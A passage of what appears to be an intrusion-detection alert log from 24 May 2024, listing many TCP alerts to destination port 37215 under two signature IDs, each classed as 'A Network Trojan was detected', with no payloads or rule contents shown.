              Timestamp:05/24/24-10:59:02.503984
              SID:2829579
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516483
              SID:2835222
              Source Port:33136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867985
              SID:2835222
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267176
              SID:2829579
              Source Port:39556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102254
              SID:2835222
              Source Port:60052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060846
              SID:2829579
              Source Port:54650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355038
              SID:2829579
              Source Port:36912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2829579
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926935
              SID:2829579
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157074
              SID:2829579
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761815
              SID:2829579
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591700
              SID:2835222
              Source Port:42886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581566
              SID:2829579
              Source Port:39774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103191
              SID:2835222
              Source Port:48352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102992
              SID:2829579
              Source Port:57802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640675
              SID:2829579
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.834370
              SID:2829579
              Source Port:60998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865530
              SID:2829579
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537343
              SID:2829579
              Source Port:59878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663586
              SID:2829579
              Source Port:33488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726398
              SID:2829579
              Source Port:48054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458359
              SID:2829579
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802132
              SID:2829579
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538676
              SID:2829579
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395582
              SID:2835222
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2835222
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245837
              SID:2829579
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574699
              SID:2829579
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689845
              SID:2835222
              Source Port:56672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048831
              SID:2829579
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123579
              SID:2829579
              Source Port:57322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802928
              SID:2829579
              Source Port:53086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575382
              SID:2829579
              Source Port:51312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395465
              SID:2835222
              Source Port:34948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100797
              SID:2835222
              Source Port:33226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313710
              SID:2829579
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763895
              SID:2835222
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102483
              SID:2829579
              Source Port:44772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153147
              SID:2829579
              Source Port:55000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578107
              SID:2829579
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187549
              SID:2829579
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726816
              SID:2835222
              Source Port:44818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327819
              SID:2835222
              Source Port:60556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450489
              SID:2835222
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189422
              SID:2829579
              Source Port:39364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127258
              SID:2835222
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771650
              SID:2829579
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520147
              SID:2829579
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589248
              SID:2835222
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394488
              SID:2835222
              Source Port:40654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157077
              SID:2835222
              Source Port:49670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517269
              SID:2829579
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361273
              SID:2829579
              Source Port:38800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206466
              SID:2835222
              Source Port:45504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375013
              SID:2829579
              Source Port:47978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821244
              SID:2829579
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875758
              SID:2835222
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976569
              SID:2835222
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477135
              SID:2835222
              Source Port:34202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517352
              SID:2829579
              Source Port:40676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857425
              SID:2835222
              Source Port:37444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545435
              SID:2835222
              Source Port:38210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422290
              SID:2829579
              Source Port:45480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308808
              SID:2835222
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823400
              SID:2829579
              Source Port:51276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101704
              SID:2835222
              Source Port:45910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267097
              SID:2829579
              Source Port:34790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522225
              SID:2835222
              Source Port:40748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816077
              SID:2835222
              Source Port:58482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205977
              SID:2829579
              Source Port:51428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873932
              SID:2835222
              Source Port:36964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445780
              SID:2829579
              Source Port:56916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763293
              SID:2835222
              Source Port:42354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923882
              SID:2829579
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2835222
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982131
              SID:2835222
              Source Port:35278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446390
              SID:2829579
              Source Port:58386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575783
              SID:2829579
              Source Port:43430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504527
              SID:2835222
              Source Port:39514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994231
              SID:2829579
              Source Port:54860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770870
              SID:2829579
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112719
              SID:2835222
              Source Port:33644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816148
              SID:2835222
              Source Port:34064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383333
              SID:2835222
              Source Port:56580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332230
              SID:2829579
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431296
              SID:2835222
              Source Port:56352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485256
              SID:2829579
              Source Port:56428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199841
              SID:2835222
              Source Port:43042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098915
              SID:2829579
              Source Port:40508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313750
              SID:2835222
              Source Port:32876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329359
              SID:2829579
              Source Port:58608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536911
              SID:2835222
              Source Port:54676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148921
              SID:2835222
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502430
              SID:2829579
              Source Port:47910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231848
              SID:2835222
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445235
              SID:2829579
              Source Port:48680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119375
              SID:2829579
              Source Port:51966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797806
              SID:2829579
              Source Port:43926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551348
              SID:2829579
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744868
              SID:2829579
              Source Port:55530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635749
              SID:2829579
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128071
              SID:2829579
              Source Port:55720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625275
              SID:2835222
              Source Port:54458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662006
              SID:2829579
              Source Port:50918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975700
              SID:2829579
              Source Port:60160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374526
              SID:2835222
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343545
              SID:2835222
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987491
              SID:2835222
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883661
              SID:2829579
              Source Port:58644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168154
              SID:2835222
              Source Port:34300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775516
              SID:2835222
              Source Port:37838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361522
              SID:2835222
              Source Port:47564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347592
              SID:2835222
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530940
              SID:2829579
              Source Port:56950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368705
              SID:2835222
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449958
              SID:2835222
              Source Port:57012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064616
              SID:2829579
              Source Port:34148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799376
              SID:2835222
              Source Port:33212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457905
              SID:2835222
              Source Port:45158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432532
              SID:2829579
              Source Port:41998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100973
              SID:2829579
              Source Port:34516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483147
              SID:2835222
              Source Port:47116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824508
              SID:2835222
              Source Port:54328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188340
              SID:2829579
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242014
              SID:2835222
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361271
              SID:2835222
              Source Port:52372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861995
              SID:2829579
              Source Port:48570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706563
              SID:2835222
              Source Port:33408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044419
              SID:2829579
              Source Port:48466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253116
              SID:2835222
              Source Port:53168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361262
              SID:2835222
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161726
              SID:2829579
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598214
              SID:2829579
              Source Port:47392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044765
              SID:2835222
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756398
              SID:2835222
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608174
              SID:2829579
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641609
              SID:2835222
              Source Port:40310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864816
              SID:2835222
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371944
              SID:2835222
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102281
              SID:2835222
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747712
              SID:2835222
              Source Port:55474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113704
              SID:2829579
              Source Port:40724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536889
              SID:2829579
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333843
              SID:2829579
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976519
              SID:2829579
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2835222
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542249
              SID:2835222
              Source Port:35168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507421
              SID:2829579
              Source Port:58868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663502
              SID:2835222
              Source Port:44622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448726
              SID:2829579
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600673
              SID:2835222
              Source Port:42910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303410
              SID:2835222
              Source Port:44174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536889
              SID:2829579
              Source Port:52776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642927
              SID:2829579
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833715
              SID:2835222
              Source Port:55468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425552
              SID:2829579
              Source Port:47742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403054
              SID:2829579
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207569
              SID:2829579
              Source Port:56938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589302
              SID:2829579
              Source Port:37428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584879
              SID:2829579
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761905
              SID:2829579
              Source Port:46000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430095
              SID:2835222
              Source Port:41454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625700
              SID:2835222
              Source Port:35512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053698
              SID:2835222
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483437
              SID:2835222
              Source Port:45470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622842
              SID:2829579
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078358
              SID:2829579
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551230
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455951
              SID:2829579
              Source Port:40796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041150
              SID:2829579
              Source Port:54028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194501
              SID:2829579
              Source Port:55874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249878
              SID:2835222
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064529
              SID:2835222
              Source Port:43362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457697
              SID:2835222
              Source Port:60306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554357
              SID:2829579
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878261
              SID:2829579
              Source Port:44648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060777
              SID:2829579
              Source Port:53786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252511
              SID:2835222
              Source Port:40020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534273
              SID:2829579
              Source Port:33778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486856
              SID:2835222
              Source Port:52086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519506
              SID:2829579
              Source Port:51856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624378
              SID:2829579
              Source Port:44418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044294
              SID:2829579
              Source Port:40464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504668
              SID:2835222
              Source Port:53882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724426
              SID:2835222
              Source Port:54106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531904
              SID:2835222
              Source Port:53210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725088
              SID:2829579
              Source Port:45582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049215
              SID:2835222
              Source Port:49534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358841
              SID:2835222
              Source Port:60668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643477
              SID:2829579
              Source Port:55980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975735
              SID:2835222
              Source Port:54912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835263
              SID:2829579
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664425
              SID:2835222
              Source Port:42714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2829579
              Source Port:38640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232772
              SID:2829579
              Source Port:55390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.757428
              SID:2835222
              Source Port:55238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111945
              SID:2835222
              Source Port:53918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664508
